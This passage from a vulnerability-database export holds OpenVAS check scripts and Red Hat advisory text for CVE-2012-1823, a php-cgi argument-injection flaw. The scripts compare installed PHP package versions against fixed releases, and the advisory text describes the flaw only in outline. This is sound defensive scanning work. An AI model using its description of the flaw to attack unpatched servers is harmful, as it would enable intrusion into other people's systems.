the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a\n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This\n could lead to the disclosure of the script's source code or arbitrary code\n execution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\n Red Hat is aware that a public exploit for this issue is available that\n allows remote code execution in affected PHP CGI configurations. This flaw\n does not affect the default configuration in Red Hat Enterprise Linux 5 and\n 6 using the PHP module for Apache httpd to handle PHP scripts.\n\n All php users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-embedded\", rpm:\"php-embedded~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-enchant\", rpm:\"php-enchant~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-zts\", rpm:\"php-zts~5.3.3~3.el6_2.8\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-06T13:07:18", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-01-04T00:00:00", "published": "2012-05-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870593", "id": "OPENVAS:870593", "title": "RedHat Update for php RHSA-2012:0546-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php RHSA-2012:0546-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a\n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This\n could lead to the disclosure of the script's source code or arbitrary code\n execution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\n Red Hat is aware that a public exploit for this issue is available that\n allows remote code execution in affected PHP CGI configurations. This flaw\n does not affect the default configuration in Red Hat Enterprise Linux 5 and\n 6 using the PHP module for Apache httpd to handle PHP scripts.\n\n All php users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-May/msg00004.html\");\n script_id(870593);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:35:43 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_xref(name: \"RHSA\", value: \"2012:0546-01\");\n script_name(\"RedHat Update for php RHSA-2012:0546-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~34.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-11T11:06:29", "bulletinFamily": "scanner", "description": "Check for the Version of php53", "modified": "2018-01-10T00:00:00", "published": "2012-05-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870591", "id": "OPENVAS:870591", "title": "RedHat Update for php53 RHSA-2012:0547-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php53 RHSA-2012:0547-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a \n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This \n could lead to the disclosure of the script's source code or arbitrary code \n execution with the privileges of the PHP interpreter. (CVE-2012-1823) \n\n Red Hat is aware that a public exploit for this issue is available that \n allows remote code execution in affected PHP CGI configurations. This flaw \n does not affect the default configuration using the PHP module for Apache \n httpd to handle PHP scripts.\n\n All php53 users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php53 on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-May/msg00005.html\");\n script_id(870591);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:35:38 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_xref(name: \"RHSA\", value: \"2012:0547-01\");\n script_name(\"RedHat Update for php53 RHSA-2012:0547-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php53\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php53\", rpm:\"php53~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-bcmath\", rpm:\"php53-bcmath~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-cli\", rpm:\"php53-cli~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-common\", rpm:\"php53-common~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-dba\", rpm:\"php53-dba~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-debuginfo\", rpm:\"php53-debuginfo~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-devel\", rpm:\"php53-devel~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-gd\", rpm:\"php53-gd~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-imap\", rpm:\"php53-imap~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-intl\", rpm:\"php53-intl~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-ldap\", rpm:\"php53-ldap~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mbstring\", rpm:\"php53-mbstring~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mysql\", rpm:\"php53-mysql~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-odbc\", rpm:\"php53-odbc~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pdo\", rpm:\"php53-pdo~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pgsql\", rpm:\"php53-pgsql~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-process\", rpm:\"php53-process~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pspell\", rpm:\"php53-pspell~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-snmp\", rpm:\"php53-snmp~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-soap\", rpm:\"php53-soap~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xml\", rpm:\"php53-xml~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xmlrpc\", rpm:\"php53-xmlrpc~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:32", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-05-08T00:00:00", "id": "OPENVAS:1361412562310870591", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870591", "title": "RedHat Update for php53 RHSA-2012:0547-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php53 RHSA-2012:0547-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-May/msg00005.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870591\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:35:38 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1823\");\n script_xref(name:\"RHSA\", value:\"2012:0547-01\");\n script_name(\"RedHat Update for php53 RHSA-2012:0547-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php53'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"php53 on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n A flaw was found in the way the php-cgi executable processed command line\n arguments when running in CGI mode. A remote attacker could send a\n specially-crafted request to a PHP script that would result in the query\n string being parsed by php-cgi as command line options and arguments. This\n could lead to the disclosure of the script's source code or arbitrary code\n execution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\n Red Hat is aware that a public exploit for this issue is available that\n allows remote code execution in affected PHP CGI configurations. This flaw\n does not affect the default configuration using the PHP module for Apache\n httpd to handle PHP scripts.\n\n All php53 users should upgrade to these updated packages, which contain a\n backported patch to resolve this issue. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php53\", rpm:\"php53~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-bcmath\", rpm:\"php53-bcmath~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-cli\", rpm:\"php53-cli~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-common\", rpm:\"php53-common~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-dba\", rpm:\"php53-dba~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-debuginfo\", rpm:\"php53-debuginfo~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-devel\", rpm:\"php53-devel~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-gd\", rpm:\"php53-gd~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-imap\", rpm:\"php53-imap~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-intl\", rpm:\"php53-intl~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-ldap\", rpm:\"php53-ldap~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mbstring\", rpm:\"php53-mbstring~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-mysql\", rpm:\"php53-mysql~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-odbc\", rpm:\"php53-odbc~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pdo\", rpm:\"php53-pdo~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pgsql\", rpm:\"php53-pgsql~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-process\", rpm:\"php53-process~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-pspell\", rpm:\"php53-pspell~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-snmp\", rpm:\"php53-snmp~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-soap\", rpm:\"php53-soap~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xml\", rpm:\"php53-xml~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php53-xmlrpc\", rpm:\"php53-xmlrpc~5.3.3~7.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 